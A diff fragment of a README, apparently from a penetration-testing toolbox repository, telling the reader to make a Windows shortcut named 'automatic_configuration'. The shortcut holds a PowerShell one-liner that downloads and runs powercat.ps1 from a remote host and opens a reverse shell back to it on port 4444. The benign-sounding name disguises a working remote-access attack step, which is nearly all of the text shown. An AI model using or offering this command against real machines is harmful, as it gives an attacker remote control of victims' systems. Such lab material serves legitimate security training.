cdnet01/Toolbox/README.md

 </libraryDescription>
 ```

-create a .lnk file, entering the following into the input field and name it 'automatic_configuration'
+right click on a windows machine to create a .lnk file, entering the following into the input field and name it 'automatic_configuration'
 ``` powershell
 powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');
 powercat -c 192.168.119.3 -p 4444 -e powershell"